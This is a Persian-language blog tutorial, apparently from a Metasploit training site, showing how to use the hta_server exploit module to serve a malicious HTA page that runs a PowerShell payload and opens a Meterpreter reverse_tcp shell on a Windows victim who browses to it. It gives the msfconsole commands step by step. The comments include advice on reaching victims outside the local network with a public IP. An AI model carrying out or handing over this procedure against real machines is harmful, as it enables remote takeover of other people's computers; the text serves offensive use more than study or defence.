ماژول hta_server متاسپلوییت

منتشر شده در دسته : بلاگ, متااسپلوییت پیشرفته

ماژول hta_server در متاسپلوییت یک اپلیکیشن HTA) HTML) را میزبانی کرده که پس از بازشدن سرور یک پیلود را از طریق پاورشل اجرا می کند. زمانیکه یک فایل عادی html اجرا می شود, اجرای آن محدود به مدل امنیتی مرورگر است در صورتیکه یک فایل hta یک اپلیکیشن کاملا مطمئن است و مجوزهایی بیش از یک فایل html را دارد. در این آزمایش نحوه بکارگیری یک سیستم ویندوزی با استفاده از وب سرور hta را در ابزار متاسپلوییت آموزش می دهیم.

ابتدا کنسول متاسپلوییت را باز کنید :

service postgresql start
msfconsole

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server

به جستجوی ماژول hta_server بپردازید

search hta_server

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server

ماژول اکسپلوییت را انتخاب کنید و یک پیلود برای آن انتخاب کنید. سپس گزینه های موجود را نمایش دهید :

use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_tcp
show options

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server

گزینه های LHOST , SRVHOST را بر روی آیپی سیستم کالی لینوکس و یک پورت دلخواه تنظیم کنید. در نهایت دستور exploit را وارد کنید تا یک سرور hta با آدرسی تصادفی ایجاد شود.

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server

اکنون کافی است تا این آدرس از طریق سیستم قربانی مرور شود

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server

تا یک نشست فعال ایجاد شود

ماژول hta_server - ماژول hta_server متاسپلوییت - ماژول نفوذ hta_server

تعداد پیام ها 7

  1. بسمه تعالی
    سلام آقای شریعتی مهر
    چند سوال داشتم :
    1- برای این که در خارج از شبکه داخلی خودمان بخواهیم کار کنیم باید هر دو را ای پی ولید سیستم کالی بدهیم ؟
    2- SRVHOST ای پی خودمان است یا قربانی ؟
    3- وقتی انجام می دهیم هیچ session اکتیوی به ما نمی دهد علت چیست؟

    1. سلام
      در تست آنلاین بایستی آیپی پابلیک کالی را به هر دو مورد بدهید
      srvhost همان آدرسی است که سرور hta بر روی آن ایجاد خواهد شد.
      تصویر ارسال نشده (حجم کمتر و فرمت معتبر ارسال کنید)

    1. بله دقیقا
      این ماژول یک سرور مخرب قابل دسترسی ایجاد می کند و مسلما اگر می خواهید به صورت عمومی قابل دسترسی باشد بایستی آدرس خارجی شبکه رو تعیین کنید.(ملاحضات قانونی را مدنظر داشته باشید)

  2. بسمه تعالی
    سلام
    جناب شریعتی آیا این موضوع فقط برای ویندوز کاربرد دارد ؟( در اندروید و ios نمی توان با این لینک نشت فعال ایجاد کرد. درست است؟ )

    1. سلام گرامی
      هر اکسپلوییتی یک پلتفورم هدف داره که می تونید به سادگی اکسپلوییت رو داخل گوگل جستجو کرده و مشخصات اون رو مشاهده کنید :
      https://www.rapid7.com/db/modules/exploit/windows/misc/hta_server
      همانطور که در لینک بالا مشاهده می کنید (با پروکسی باز کنید) پلتفورم ویندوز هست و اهداف اجرا پاورشل هستند پس خیر در اندروید و ios کار نمی کند.
      موفق باشید

خوشحال می شویم دیدگاههای خود را در میان بگذارید * فرصت پاسخگویی به سوالات در بلاگ وجود ندارد

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *